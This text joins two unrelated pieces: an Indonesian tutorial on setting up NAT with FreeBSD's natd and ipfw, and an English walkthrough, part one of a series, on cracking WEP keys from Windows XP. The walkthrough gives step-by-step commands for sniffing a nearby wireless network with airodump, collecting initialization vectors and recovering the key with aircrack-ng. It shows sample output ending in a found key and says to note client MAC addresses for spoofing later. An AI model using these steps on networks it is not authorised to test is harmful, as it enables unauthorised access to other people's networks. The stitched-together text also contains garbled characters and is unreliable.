Network Address Translation (NAT): Cara lain menghemat IP Address

bleckock@yahoo.com

bleckock@gmail.com

Misi awal Internet adalah sebagai jaringan komunikasi non-profit. Pada awalnya, Internet didesain tanpa memperhatikan dunia bisnis. Kemudian hal ini menjadi masalah sekarang dan di masa depan. Dengan semakin banyaknya penghuni Internet, baik pencari informasi maupun penyedia informasi, maka kebutuhan akan pengalamatan di Internet makin membengkak. Kebutuhan besar akan IP address biasanya terjadi di jaringan komputer perusahaan dan LAN-LAN di lembaga pendidikan.

IP address sebagai sarana pengalamatan di Internet semakin menjadi barang mewah dan ekslusif. Tidak sembarang orang sekarang ini bisa mendapatkan IP address yang valid dengan mudah. Oleh karena itulah dibutuhkan suatu mekanisme yang dapat menghemat IP address. Logika sederhana untuk penghematan IP address ialah dengan meng-share suatu nomor IP address valid ke beberapa client IP lainnya. Atau dengan kata lain beberapa komputer bisa mengakses Internet walau kita hanya memiliki satu IP address yang valid. Salah satu Mekanisme itu disediakan oleh Network Address Translation (NAT)

Beberapa Konsep Dasar

Sebelum kita membahas lebih lanjut ada baiknya kita urai kembali konsep-konsep dasar yang harus dipahami sebelum masuk ke NAT. Diantaranya adalah TCP/IP, Gateway/Router, dan Firewall.

TCP/IP

Protokol yang menjadi standar dan dipakai hampir oleh seluruh komunitas Internet adalah TCP/IP (Transmission Control Protocol/Internet Protocol). Agar komputer bisa berkomunikasi dengan komputer lainnya, maka menurut aturan TCP/IP, komputer tersebut harus memiliki suatu address yang unik. Alamat tersebut dinamakan IP address. IP Address memiliki format sbb: aaa.bbb.ccc.ddd. Contohnya: 167.205.19.33

Yang penting adalah bahwa untuk berkomunikasi di Internet, komputer harus memiliki IP address yang legal. Legal dalam hal ini artinya adalah bahwa alamat tersebut dikenali oleh semua router di dunia dan diketahui bahwa alamat tersebut tidak ada duplikatnya di tempat lain. IP address legal biasanya diperoleh dengan menghubungi InterNIC.

Suatu jaringan internal bisa saja menggunakan IP address sembarang. Namun untuk tersambung ke Internet, jaringan itu tetap harus menggunakan IP address legal. Jika masalah routing tidak dibereskan (tidak menggunakan IP address legal), maka saat sistem kita mengirim paket data ke sistem lain, sistem tujuan itu tidak akan bisa mengembalikan paket data tersebut, sehingga komunikasi tidak akan terjadi.

Dalam berkomunikasi di Internet/antar jaringan komputer dibutuhkan gateway/router sebagai jembatan yang menghubungkan simpul-simpul antar jaringan sehingga paket data bisa diantar sampai ke tujuan.

Gateway/Router

Gateway adalah komputer yang memiliki minimal 2 buah network interface untuk menghubungkan 2 buah jaringan atau lebih. Di Internet suatu alamat bisa ditempuh lewat gateway-gateway yang memberikan jalan/rute ke arah mana yang harus dilalui supaya paket data sampai ke tujuan. Kebanyakan gateway menjalankan routing daemon (program yang meng-update secara dinamis tabel routing). Karena itu gateway juga biasanya berfungsi sebagai router. Gateway/router bisa berbentuk Router box seperti yang di produksi Cisco, 3COM, dll atau bisa juga berupa komputer yang menjalankan Network Operating System plus routing daemon. Misalkan PC yang dipasang Unix FreeBSD dan menjalankan program Routed atau Gated. Namun dalam pemakaian Natd, routing daemon tidak perlu dijalankan, jadi cukup dipasang gateway saja.

Karena gateway/router mengatur lalu lintas paket data antar jaringan, maka di dalamnya bisa dipasangi mekanisme pembatasan atau pengamanan (filtering) paket-paket data. Mekanisme ini disebut Firewall.

Firewall

Sebenarnya Firewall adalah suatu program yang dijalankan di gateway/router yang bertugas memeriksa setiap paket data yang lewat kemudian membandingkannya dengan rule yang diterapkan dan akhirnya memutuskan apakah paket data tersebut boleh diteruskan atau ditolak. Tujuan dasarnya adalah sebagai security yang melindungi jaringan internal dari ancaman dari luar. Namun dalam tulisan ini Firewall digunakan sebagai basis untuk menjalankan Network Address Translation (NAT).

Dalam FreeBSD, program yang dijalankan sebagai Firewall adalah ipfw. Sebelum dapat menjalankan ipfw, kernel GENERIC harus dimodifikasi supaya mendukung fungsi firewall. Ipfw mengatur lalu lintas paket data berdasarkan IP asal, IP tujuan, nomor port, dan jenis protocol. Untuk menjalankan NAT, option IPDIVERT harus diaktifkan dalam kernel.

DIVERT (mekanisme diversi paket kernel)

Socket divert sebenarnya sama saja dengan socket IP biasa, kecuali bahwa socket divert bisa di bind ke port divert khusus lewat bind system call. IP address dalam bind tidak diperhatikan, hanya nomor port-nya yang diperhatikan. Sebuah socket divert yang dibind ke port divert akan menerima semua paket yang didiversikan pada port tersebut oleh mekanisme di kernel yang dijalankan oleh implementasi filtering dan program ipfw. Mekanisme ini yang dimanfaatkan nantinya oleh Network Address Translator.

Itulah beberapa bahasan awal yang akan mengantar kita ke pembahasan inti selanjutnya.

Network Address Translation (NAT)

Dalam FreeBSD, mekanisme Network Address Translation (NAT) dijalankan oleh program Natd yang bekerja sebagai daemon. Network Address Translation Daemon (Natd) menyediakan solusi untuk permasalahan penghematan ini dengan cara menyembunyikan IP address jaringan internal, dengan membuat paket yang di-generate di dalam terlihat seolah-olah dihasilkan dari mesin yang memiliki IP address legal. Natd memberikan konektivitas ke dunia luar tanpa harus menggunakan IP address legal dalam jaringan internal.

Natd menyediakan fasilitas Network Address Translation untuk digunakan dengan socket divert. Natd mengubah semua paket yang ditujukan ke host lain sedemikian sehingga source IP addressnya berasal dari mesin Natd. Untuk setiap paket yang diubah berdasarkan aturan ini, dibuat tabel translasi untuk mencatat transaksi ini.

Dengan NAT, aturan bahwa untuk berkomunikasi harus menggunakan IP address legal, dilanggar.NAT bekerja dengan jalan mengkonversikan IP-IP address ke satu atau lebih IP address lain. IP address yang dikonversi adalah IP address yang diberikan untuk tiap mesin dalam jaringan internal (bisa sembarang IP). IP address yang menjadi hasil konversi terletak di luar jaringan internal tersebut dan merupakan IP address legal yang valid/routable.

Mekanisme NAT

Sebuah paket TCP terdiri dari header dan data. Header memiliki sejumlah field di dalamnya, salah satu field yang penting di sini adalah MAC (Media Access Control) address asal dan tujuan, IP address asal dan tujuan, dan nomor port asal dan tujuan.

Saat mesin A menghubungi mesin B, header paket berisi IP A sebagai IP address asal dan IP B sebagai IP address tujuan. Header ini juga berisi nomor port asal (biasanya dipilih oleh mesin pengirim dari sekumpulan nomor port) dan nomor port tujuan yang spesifik, misalnya port 80 (untuk web).

Kemudian B menerima paket pada port 80 dan memilih nomor port balasan untuk digunakan sebagai nomor port asal menggantikan port 80 tadi. Mesin B lalu membalik IP address asal & tujuan dan nomor port asal & tujuan dalam header paket. Sehingga keadaan sekarang IP B adalah IP address asal dan IP A adalah IP address tujuan. Kemudian B mengirim paket itu kembali ke A. Selama session terbuka, paket data hilir mudik menggunakan nomor port yang dipilih.

Router (yang biasa – tanpa Natd) memodifikasi field MAC address asal & tujuan dalam header ketika me-route paket yang melewatinya. IP address, nomor port, dan nomor sequence asal & tujuan tidak disentuh sama sekali.

NAT juga bekerja atas dasar ini. Dimulai dengan membuat tabel translasi internal untuk semua IP address jaringan internal yang mengirim paket melewatinya. Lalu men-set tabel nomor port yang akan digunakan oleh IP address yang valid. Ketika paket dari jaringan internal dikirim ke Natd untuk disampaikan keluar, Natd melakukan hal-hal sebagai berikut:

1. Mencatat IP address dan port asal dalam tabel translasi

2. Menggantikan nomor IP asal paket dengan nomor IP dirinya yang valid

3. Menetapkan nomor port khusus untuk paket yang dikirim keluar, memasukkannya dalam tabel translasi dan menggantikan nomor port asal tersebut dengan nomor port khusus ini.

Ketika paket balasan datang kembali, Natd mengecek nomor port tujuannya. Jika ini cocok dengan nomor port yang khusus telah ditetapkan sebelumnya, maka dia akan melihat tabel translasi dan mencari mesin mana di jaringan internal yang sesuai. Setelah ditemukan, ia akan menulis kembali nomor port dan IP address tujuan dengan IP address dan nomor port asal yang asli yang digunakan dulu untuk memulai koneksi. Lalu mengirim paket ini ke mesin di jaringan internal yang dituju. Natd memelihara isi tabel translasi selama koneksi masih terbuka.

Gambar Contoh Mekanisme Natd

Perbedaan dengan sistem Proxy

Hampir mirip dengan NAT, suatu jaringan kecil dengan proxy bisa menempatkan beberapa mesin untuk mengakses web dibelakang sebuah mesin yang memiliki IP address valid. Ini juga merupakan langkah penghematan biaya dibanding harus menyewa beberapa account dari ISP dan memasang modem & sambungan telepon pada tiap mesin.

Namun demikian, proxy server ini tidak sesuai untuk jaringan yang lebih besar. Bagaimanapun, menambah hard disk dan RAM pada server proxy supaya proxy berjalan efisien tidak selalu dapat dilakukan (karena constraint biaya). Lagi pula, persentase web page yang bisa dilayani oleh cache proxy akan makin menurun sejalan dengan semakin menipisnya ruang kosong di hard disk, sehingga penggunaan cache proxy menjadi tidak lebih baik dari pada sambungan langsung. Tambahan lagi, tiap koneksi bersamaan akan meng-generate proses tambahan dalam proxy. Tiap proses ini harus menggunakan disk I/O channel yang sama, dan saat disk I/O channel jenuh, maka terjadilah bottle neck.

NAT menawarkan solusi yang lebih fleksibel dan scalable. NAT menghilangkan keharusan mengkonfigurasi proxy/sock dalam tiap client. NAT lebih cepat dan mampu menangani trafik network untuk beribu-ribu user secara simultan.

Selain itu, translasi alamat yang diterapkan dalam NAT, membuat para cracker di Internet tidak mungkin menyerang langsung sistem-sistem di dalam jaringan internal. Intruder harus menyerang dan memperoleh akses ke mesin NAT dulu sebelum menyiapkan serangan ke mesin-mesin di jaringan internal. Penting di ketahui bahwa, sementara dengan NAT jaringan internal terproteksi, namun untuk masalah security, tetap saja diperlukan paket filtering dan metoda pengamanan lainnya dalam mesin NAT.

Contoh Kasus Installasi Natd

Sebuah perusahaan kecil memiliki sejumlah komputer dan sambungan ke Internet. Komputer-komputer itu saat ini telah membentuk suatu LAN. Sambungan Internet-nya diasumskan berupa dedicated T1 link

Langkah-langkah yang harus dilakukan

1. Installasi FreeBSD

Sediakan satu komputer untuk dijadikan Gateway. Penulis menyarankan penggunaan FreeBSD RELEASE 2.2.6 (Natd hanya jalan di FreeBSD 2.2.1 ke atas), karena selain gratis juga requirement hardware-nya tidak terlalu boros. PC 486 dengan 16 MB memory dan HD 850 MB juga sudah cukup mewah.

Untuk mengetahui proses installasi FreeBSD, silahkan baca kembali tulisan-tulisan di Infokomputer sebelumnya dan manual FreeBSD sendiri.

2. Installasi Gateway

Pasang 2 network interface agar mesin ini menjadi gateway. Network Card (misal NE2000 atau 3COM) satu dihubungkan ke jaringan internal dan satu lagi untuk koneksi ke ISP. Misalnya dua-duanya NE2000 Compatible. maka nick untuk card yang menghadap ke dalam adalah ed0 dan untuk card yang menghadap keluar adalah ed1.

Pastikan juga option gateway = ”YES” tertulis dengan benar dalam file rc.conf. Atau bisa juga dengan mengetik perintah: sysctl -w net.inet.ip.forwarding=1

3. Installasi Firewall

Pasang IP firewall di mesin FreeBSD ini. Caranya adalah :

a. Edit kernel source di /usr/src/sys/i386/conf

Tambahkan option-option berikut ini pada file kernel.

options IPFIREWALL

options IPFIREWALL_VERBOSE

options “IPFIREWALL_VERBOSE_LIMIT=100”

options IPDIVERT

b. Compile kernel tersebut

c. Aktifkan firewall di rc.conf dengan menambahkan

firewall="YES"

firewall_type="OPEN"

3. Installasi Natd

Langkah-langkahnya adalah sbb:

a. Download source nya di ftp://ftp.suutari.iki.fi/pub/natd

b. Unzip dan untar archive tersebut dengan perintah

gzip -dc natd_1.12.tar.gz | tar -xvf -

c. Lakukan make dan make install di direktori yang dihasilkan. Ketikkan perintah berikut:

cd natd_1.12

make

make install

d. Edit startup file supaya Natd berjalan secara otomatis

Buat file natd.sh di /usr/local/etc/rc.d. Isi file tersebut adalah

#!/bin/sh

/sbin/ipfw -f flush

/sbin/ipfw add divert 13494 ip from any to any via ed0

/sbin/ipfw add pass all from 127.0.0.1 to 127.0.0.1

/sbin/ipfw add pass ip from any to any

/usr/local/sbin/natd -port 13494 -interface ed0

Arti dari file ini adalah:

v Hapuskan semua rule firewall

v Tambahkan feature divert di port 13494 (Anda bisa mengganti ini dengan port yang Anda inginkan) untuk mendiversi paket dari dan ke gateway lewat interface ed0

v Bolehkan semua paket lewat di atas local host

v Bolehkan semua paket IP lewat semua interface

v Jalankan Natd dengan menjadi daemon yang menunggu di port 13494 via interface ed0.

e. Reboot mesin FreeBSD-nya supaya setting bisa diaktifkan.

4. Konfigurasikan TCP/IP Client.

Jadikan nomor IP card ed0 di FreeBSD sebagai gateway dari tiap workstation, IP tiap-tiap work station harus berada dalam network yang sama dengan card ed0 yang ada di mesin gateway. Misal ed0 di-beri nomor IP 192.168.1.1 dan ed1 167.205.19.5, maka workstation diberi nomor IP 192.168.1.2 s/d 192.168.1.14 jika digunakan mask 16 atau 255.255.255.240. ed1 adalah interface yang memiliki IP address valid

Setelah semuanya langkah-langkah di atas dijalankan dengan baik maka, applikasi Internet di client siap dijalankan via NAT.

Untuk kasus lain misalnya sambungan ke Internet-nya menggunakan modem, maka mekanismenya sama saja, tinggal diganti interface di gateway yang menghadap keluar dengan interface modem (tun0) dan jalankan program ppp untuk men-dial ISP-nya. Khusus untuk dial-out, ppp sebenarnya memiliki mekanisme sendiri untuk kasus ini yaitu dengan option -alias. Jadi jika kita menjalankan ppp dengan option -alias maka kita tidak perlu menjalankan Natd, karena option ini menyediakan fasilitas yang sama dengan Natd khusus untuk dial-out.

Natd hanyalah salah satu cara untuk menghemat persediaan IP address yang semakin menipis. Dengan adanya fakta bahwa untuk bergabung ke Internet, host pencari informasi (Client) sebenarnya tidak perlu memiliki IP address legal, maka IP address legal tersebut bisa dicadangkan untuk host-host penyedia informasi (Server). Penelitian untuk terus memperbaiki performansi Internet ini masih terus dikembangkan. Sekarang ini juga sedang dikembangkan model IP versi baru yaitu IP versi 6 (IPv6), yang bisa menampung lebih banyak lagi komputer-komputer di Internet. Namun demikian untuk kondisi sekarang, Natd masih merupakan solusi ampuh sebelum IPv6 diterapkan.

Referensi

Douba, Salim. Networking UNIX, The Complete Reference for UNIX networks. SAMS Publishing. 1995

Unix Integration to WAN: Applied Computer Internetworking. CNRG ITB

FreeBSD Handbook. FreeBSD Inc.

This is part one in a two part paper on Cracking WEP with Windows XP. This first part covers sniffing wireless traffic and
obtaining the WEP key. Part Two will cover associating with a Wireless AP, spoofing your MAC address, trying to log on
administratively to the AP and further things you can carry out on the WLAN once authenticated successfully.


What is WEP:

Wired Equivalent Privacy (WEP) is often mistakenly thought of as a protocol designed to 100% protect wireless traffic, when this
is not the case.
As its name suggests it was designed to give wireless traffic the same level of protection as a wired LAN, which when you think
about it is a very hard thing to set out to do.

LAN�s are inherently more secure than Wireless LAN�s (WLAN) due to physical and geographical constraints. For an
attacker to sniff data on a LAN they must have physical access to it � which is obviously easier to prevent than to
prevent access to traffic on a WLAN.

WEP works at the lower layers of the OSI model, layers One and Two to be exact, so it therefore does not provide total end to end
security for the data transmission.

WEP can provide a level of security between a Wireless Client and an Access Point or between two wireless clients.


WEP Standards:

WEP is commonly implemented as a 64 bit or 128 bit encryption. These encryption strengths can sometimes be referred to as 40 bit
or 104 bit due to the fact that each data packet is encrypted with an RC4 cipher stream which gets generated by an RC4 key. This
RC4 key for say a 64 but WEP implementation is composed of a 40 bit WEP key and a 24 bit Initialization Vector (IV) �
hence the 64 bit RC4 key, however the actual WEP part of it is only 40 bits long, the IV taking up the other 24 bits, which is why
a 64 bit WEP key is sometime referred to as a 40 bit WEP key.

This resultant cipher is �XOR�d� with the plain text data to encrypt the whole packet. To decrypt the
packet the WEP key is used to generate an identical �key stream� at the other end to decrypt the whole packet but
more about this later on, I will also go over the IV�s in more detail later on as well.


Failures of WEP:

We have heard everyone say WEP is easy to crack and should not be used, can be cracked in 10 minutes etc but why is this?

Well in my opinion WEP is seriously flawed for the following reasons:

1) Initialization Vectors are reused with encrypted packets. As an IV is only 24 bits long it is only a matter of time before it
is reused. Couple this with the fact you may have 50 + wireless clients using the same WEP key and the chances of it being reused
improve even further.
An IV is sent in clear along with the encrypted part of the packet. The reuse of any encryption element is always a fundamental
flaw to that particular encryption and as an IV is sent in clear this further exposes a significant weakness in WEP.

As more RC4 cipher steams are found and more IV�s are deciphered and the closer we get to discovering the WEP key.

This is what forms the foundation of WEP cracking.


2) The algorithm used to encrypt a WEP �hash� is not intended for encryption purposes. The original purpose of the
Cyclic Redundancy Check (CRC-32) was to detect errors in transmission, not to encrypt data.


3) The most significant flaw in my opinion is the mass use of the WEP key. Everything using that particular AP will need the same
WEP key hence all the resultant traffic will be using the exact same WEP key as well.
The one not so obvious side-affect of this is when it comes to administering the network. If you have 60 wireless clients all
using the same WEP key, do you really want to go and periodially change them all�..it is easier to leave it as it
is. I am guilty of doing this on a network I used to administer a few years ago as I am sure others are who still use WEP.

Wireless Standards:

Today 802.11 has many different implementations for wireless traffic. The most common ones are:

1) 802.11 � this specifies that the wireless traffic will use the 2.4GHz frequency band utilizing either Frequency Hoping
Spread Spectrum (FHSS) or Direct Sequence Spread Spectrum (DSSS). The FHSS is a protocol whereby the traffic
�hops� to pre-defined frequencies and is commonly used to reduce the effects of noise or interference in the
transmission. DSSS is also a protocol used to reduce noise interference by combining the signal with a higher data rate bit
sequence (commonly called a chipping code) which separates the data up in to a logical sequence and attaches a form of CRC to the
packet before transmitting.

2) 802.11a � this provides data transmission in the 5GHz band at a rate of anything up to 54Mbps. Unlike the original
802.11 specification this uses Orthogonal Frequency Division Multiplexing (OFDM) to encode the traffic instead of FHSS or DSSS.
OFDM is a method of transmitting digital data by splitting it up in to smaller �chunks� and transmitting them at
the same time but on different frequencies, which is why the data transfer rate is quite good.

3) 802.11b � came along in 1999 with the intention of allowing wireless functionality to be similar to that provided by
Ethernet. It transmits data in the 2.4GHz band at 11Mbps using DSSS only. Is sometimes called Wi-Fi.

4) 802.11g � this works in the 2.4 GHz band at a rate of 20Mbps or more and came along in 2003. It uses OFDM like 802.11a
and transmits data in a very similar way. However unlike 802.11a it is backward compatible with 802.11b.

A point worth noting here is if you have an 802.11b Wireless Adaptor you will not be able to receive 802.11g traffic. If you do
want to get in to WEP cracking it is well worth your while investing in a dual band card. I will talk about Wireless Adaptors more
later on.

How do we crack WEP:

Well cracking WEP is fairly easy to understand if you have followed what I explained above. We briefly touched on IV�s and
WEP encryption and how they tie in together. To put it very simply, if you can decipher the IV algorithm you can decrypt or
extract the WEP key.

As I stated before WEP very kindly transmits the IV in clear, so if we can run a mathematical equation against it we can find and
decipher the RC4 stream that encrypted the whole packet in the first place.

The WEP �key� is the missing value [key] from this mathematical equation. Remember the AP or the client has this
key to use when decrypting the packet and is what we must find by running a complicated algorithm against the encrypted packet.

If you think about it like this it may become clearer:

You have an algorithm that is produced by concatenating a randomly generated 24 bit IV with your WEP Key � You also have
an RC4 Key stream - the two are then �hashed� together to encrypt the packet.

The IV is the hub of the whole process as this is they only thing that has used your WEP key. If we run a statistical anyalisis
against the IV to try and decrypt the packet, we can find the key used at the begining of the process.

When you try to decrypt them, every time you crack a piece of the algorithm the corresponding plain text part of the packet is
revealed, once the whole packet is decrypted you know the algorithm used to encrypt that particular packet � A crude way
of describing it but as simple as I can make it.

Any attacker can passively collect encrypted data, after a while due to the limitations explained earlier; two IV�s that
are the same will be collected. If two packets with the same IV are XOR�d, an XOR of the plain text data can be revealed.
This XOR can then be used to infer data about the contents of the data packets.

The more identical IV�s collected the more plain text data can be revealed. Once all the plain text of a data packet is
known, it will also been known for all data packets using the same IV.

So before any transmission occurs WEP combines the keystream with the payload using an XOR process, which produces ciphertext
(data that has been encrypted). WEP includes the IV in clear in the first few bytes of the frame. The receiving AP / Client uses
this IV along with the shared secret key (Your WEP Key) to decrypt the payload of the frame.

XOR is a mathematical algorithm which I am not even going to attempt to explain. This site explains it very well though:
http://mathworld.wolfram.com/XOR.html


So in short � the more identical IV�s we can get the more plain text data we can reveal and the closer we get to
obtaining the key used to encrypt the data in the first place.

As it is not pre-determined when we are going to receive identical IV�s it is impossible to say how many IV�s need
to be collected but more about that later.

Software Used:

For this attack I am going to use aircrack-ng for Windows which can be obtained from here:
http://tinyshell.be/aircrackng/wiki/index.php?title=Aircrack-ng
Whilst here download cygwin1.dll and paste it in to the same folder as Aircrack-ng. There is a copy of cygwin1.dll included
already but the one available from the tinyshell site is a later version of it.
The peek.dll and peek5.sys files also need to be in the same directory as aircrack. They are available
http://www.aircrack-ng.org/doku.php?id=downloads&DokuWiki=ae7e6106d0b7685530d083fb6b8a9761
If you download Winaircrack - which is a GUI version of what I cover in this paper - copy the peek.dll and peek5.sys files across
to where you have aircrack stored. You will get a peek driver not found message if you dont do this.

Once it has downloaded you have to option of pasting the directory path of it in to your Command Prompt path so you can start the
application straight from the command line without having to �CD� to the correct directory.
For example I copied this in to my path: C:Documents and SettingsNokiaDesktopaircrack-ng-0.3-winaircrack-ng-0.3-winin
In the bin folder is airodump and aircrack-ng � so now I can just type airodump straight in to the command prompt to run
the application.

To add something to your path:

Right click My Computer > Properties > Advanced > Environment Variables > Under System Variables highlight PATH >
Edit > enter the directory path using a ; to separate it from any existing entries.

You also need to go to Wild Packets to pick up a new driver for your card. http://www.wildpackets.com/

I have found that the most common cause of stress when trying to crack WEP is incompatible hardware. The Airopeek driver from Wild
Packets is not compatible with all types of hardware. There is a list of supported adaptors and the relevant driver you need to
use on the web site.

For this crack I am using an Atheros based NETGEAR WAG511 DUAL BAND adaptor which you can get from any good electrical stored for
around 40 AUD

This card works with Whax, Auditor and BackTrack pretty much straight out of the box. It is also a dual band so you don�t
have to worry about sniffing traffic on a �g� WLAN when you have a �b� wireless adaptor. It is my
preferred Wireless Adaptor and has not let me down yet.
Most cards that are Atheros based will have the Atheros logo on the side of the box, use one of these if possible.

**Some people I know have confused the NETGEAR WG511 which does not work, with the NETGEAR WG511T which does work so try not to
fall in to this trap**

Cards that I can 100% say to stay away from are ones that use the PrisimGT chipset. Connexant cards are also a complete waste of
time (which I found out the hardway) so please do not even think about buying one of these if you want to crack WEP.

See this list to check what chipset your card uses:
http://www.linux-wlan.org/docs/wlan_adapters.html.gz

So you should now have:

Aircrack-ng
Cygwin1.dll � in the same directory as Aircrack
Peek.dll and Peek5.sys in the same directory as Aircrack
Relevant Drivers from Wild Packets for your Adaptor
Added aircrack-ng to your PATH
Got an Adaptor that works with all of the above!

So what�s next?

Now we need to install the driver you have downloaded.
**Warning � the next procedure will overwrite your existing Windows driver, so make sure you have the disc or a backup of
it before carrying on.**

The peek driver will not let you use your Wireless Adaptor in the conventional way. You won�t be able to associate to an
AP with it or browse the internet etc.

99% of Windows drivers a designed to make your Wireless Adaptor reject any 802.11 traffic not destined for it. The Peek driver
puts your Adaptor in to a promiscuous mode to allow it to sniff all 802.11 traffic that is compatible with your adaptor.

To install the driver open up your Device Manager and right click on your wireless adaptor > Update Driver > Install from a
Specific Location > Don�t Search, I will chose the driver to install > Have Disk > Browse to where you have
downloaded the driver > Double Click.

Windows may display a prompt warning you that the driver is not digitally signed, if ths happens click continue anyway.

Once the driver is installed we are ready to crack WEP.

**If you get an error message saying �The specified destination contains no information about your device�, you
have either downloaded the wrong driver or more likely your Wireless Adaptor is not compatible with what we need it to do.**

Cracking WEP:

Cracking WEP is by now means a skilful thing to do, as all the hard work was done by Chris Devine who is the excellent coder of
Aircrack, all we need to do is collect the data and start the program. If you have questions about Aircrack a good place to post
them is on the Netstumbler Linux Forums as I believe the author checks here quite often. Alternatively you can email the author at
devine [at] iie [dot] cnam [dot] fr � whether he will reply or not I don�t know but I wouldn�t have
thought he will appreciate you emailing him with stupid questions � use the forum for these!


Airodump

So open a command prompt and type Airodump � or if you have not added it to your PATH you will need to CD to the right
directory.

A new window opens now which will search for all installed wireless adaptors, give it a numerical signature and display the
following:
Code:
usage: airodump [ivs only flag]

Known network adapters:

14 NETGEAR WG511T 54 Mbps Wireless PC Card
22 NETGEAR WAG511 802.11a/b/g Dual Band Wireless PC Card

Network interface index number ->


Select the relevant ID for the card you want to use:
Code:
Network interface index number -> 22


You are then prompted to enter the type of chipset of your card:
Code:
Interface types: 'o' = HermesI/Realtek
'a' = Aironet/Atheros

Network interface type (o/a) ->


We are using an Atheros card so we enter 'a':
Code:
Network interface type (o/a) -> a


Then you are asked what channel you would like it to sniff traffic on:
Code:
Channel(s): 1 to 14, 0 = all ->


The USA only uses up to channel 11 and Europe use up to channel 14. Channel 11 in the UK is the most common one that wireless
AP�s default to however, so I normally start off with channel 11. If you want to scan all channels use the 0 option.

We shall use channel 11:
Code:
Channel(s): 1 to 14, 0 = all -> 11


Now you are asked what you would like to save your capture file as:
Code:
(note: if you specify the same output prefix, airodump will resume the capture session by appending data to the existing capture
file)

Output filename prefix ->


If you specify a file name that you have already used the resulting data will be added to the file � which is an excellent
feature if it becomes apparent later on that you do not have enough IV�s as you won�t have to start all over
again!
Code:
Output filename prefix ->WEP1


Now you are asked if you only want to save the IV�s or all packets that are sniffed.
Code:
(note: to save space and only store the captured WEP IVs, press y.The resulting capture file will only be useful for WEP
cracking)

Only write WEP IVs (y/n) ->


As we know to crack a WEP key we only need IV�s so we can select yes to this question. The resultant file will be saved as
an .IVS file.
Code:
Only write WEP IVs (y/n) -> y


So now we have told it everything it needs to know, let�s see what happens:
Code:

BSSID PWR Beacons # Data CH MB ENC ESSID

00:09:5B:FD:C6:52 10 3 6 11 54 OPN HOMEWIRELESS
00:30:F1:F5:A1:35 60 359 1234 11 54 WEP Stuart

BSSID STATION PWR Packets ESSID

00:09:5B:FD:C6:52 00:09:5B:B6:1D:2A 17 6 HOMEWIRELESS
00:30:F1:F5:A1:35 00:09:5B:84:A6:DF 87 1793 Stuart


This is the output from a successful Airodump start-up.

BSSID = The MAC address of the Wireless Access Point.
PWR = The strength of the signal being received
BEACONS = Every AP transmits around 10 beacons per second � these are not encrypted and are useless to us from a WEP
cracking point of view � they basically say � I�m an AP, come and associate with me�.
DATA = This is what we are interested in. DATA packets are our IV�s that we need and what we are most interested in.
ENC = Encapsulation � WEP / WPA / OPEN etc � speaks for itself
ESSID = The name of the wireless network. This is not always broadcasted by the AP but we will need it to associate with the AP
later on.

The second part lists any associated clients that are talking to the AP. MAKE A NOTE OF THESE MAC ADDRESSES.

Some AP�s have MAC address filtering enabled. This is a table of MAC addresses stored on the AP � when you try to
associate with the AP if MAC filtering is enabled the AP checks your MAC with the list of allowed MAC�s to see if you can
associate with it. If it is not in the list, regardless of if you have the correct WEP key or not, you will not be allowed to
associate with the AP. You will also leave an entry in the logs.
This is a very helpful feature of Airodump that informs us what we need to spoof our MAC to when associating with the AP.



DATA:

As I mentioned before it is impossible to give an exact number of IV�s that need to be collected to crack a WEP key. The
more we can get the more chance we have of cracking the WEP key. From trial and error I have found that I can crack a 40 bit WEP
key in a few seconds with around 250,000 � 400,00 IV�s. You may be able to do it with more IV�s or less
IV�s, it is different every time.
For a 104 bit WEP key you will need anything up to 2000000 IV�s and maybe even more. The fewest amount of IV�s I
have ever been able to use in one of my lessons for a 104 bit crack is 710,325 and this took just 4 minutes 31 seconds to crack
but in other lessons I have had to collect in excess of 2 million.

This is where the very handy feature of Airodump amending to existing files is useful. If you have collected 500,000 and run a 64
bit attack on the file but are unsuccessful, simply start Airodump again and use the same file name, all the new IV�s will
be added to the ones you already have, so you don�t have to start from the beginning all over again!

So now sit there and wait for the amount of IV�s that you decide on to be collected!


Aircrack-ng


So once you have decided you have enough IV�s press CTL + C to end Airodump. I have collected 413,994 IV�s for
this crack.

You will still have the white command prompt open so just type Aircrack-ng at the prompt. (Or �CD� to it)

You will now get a list of �usages� for Aircrack that you can use.
Code:

Common options:

-a : force attack mode (1/WEP, 2/WPA-PSK)
-e : target selection: network identifier
-b : target selection: access point's MAC
-q : enable quiet mode (no status output)
-w : path to a dictionary file

Static WEP cracking options:

-c : search alpha-numeric characters only
-t : search binary coded decimal chr only
-d : debug - specify beginning of the key
-m : MAC address to filter usable packets
-n : WEP key length: 64 / 128 / 152 / 256
-i : WEP key index (1 to 4), default: any
-f : bruteforce fudge factor, default: 2
-k : disable one attack method (1 to 17)
-x : do bruteforce the last two keybytes
-y : experimental single bruteforce mode

Aircrack-ng 0.3 - (C) 2006 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org

usage: aircrack-ng [options]


As this paper is getting a bit long I will just cover the options we need to crack a WEP key from a file. If you want to try the
other options out..try them and see what you come up with. The helpful descriptions provided speak for themselves really.

So we have collected 413,994 IV�s which is not enough for a 104 bit WEP crack so we will try a 40 bit WEP crack instead
(we can always add IV�s to the file later on if it does not work)

So we issue the following command to Aircrack:
Code:
C:Docu~
okia>aircrack-ng -n 64 WEP1.ivs


We use the �n 64 switch to tell it we think it is a 64 bit WEP key.

You can also use the �f switch, which is the fudge factor switch.
In the programmers own words:

�By default, this parameter [fudge factor] is set to 2 for 104-bit WEP and to 5 for 40-bit WEP. Specify a higher value to
increase the brute force level: cracking will take more time, but with a higher likelihood of success.

So if you have no joy cracking it you can try again with the �f 5 switch.


If you forget what you called the Airodump file it is saved in the following directory by default:

C:Documents and Settings\%User Name%

If you selected to only save the IV�s it will be an .IVS file, if you said No and wanted to save everything it will be a
.cap file.

Our scan only turned up one network so Aircrack will only crack those IV�s, if you have more than one network you will
need to use the �m switch to tell it the BSSID of the AP whose packets you want to use,



The result of issuing our command is:
Code:
Aircrack-ng 0.3


[00:00:00] Tested 1231 keys (got 413994 IVs)

KB depth byte(vote)
0 0/ 4 A6( 68) 82( 40) EE( 20) E4( 15) 18( 5) 23( 5) 04( 3)
1 0/ 3 22( 75) 52( 19) 43( 15) 5A( 13) 21( 8) 8A( 5) B2( 4)
2 0/ 1 04( 76) 33( 8) 8B( 5) C8( 5) 47( 0) 62( 0) 63( 0)
3 0/ 1 09( 106) FB( 15) ED( 12) 58( 12) F0( 11) 29( 7) C8( 5)
4 0/ 1 EB( 153) 19( 27) 0E( 15) 38( 15) B8( 13) E0( 10) DC( 9)

KEY FOUND! [ A6:22:04:09:EB ]


There you have it our 40 bit WEP key is A6:22:04:09:EB.

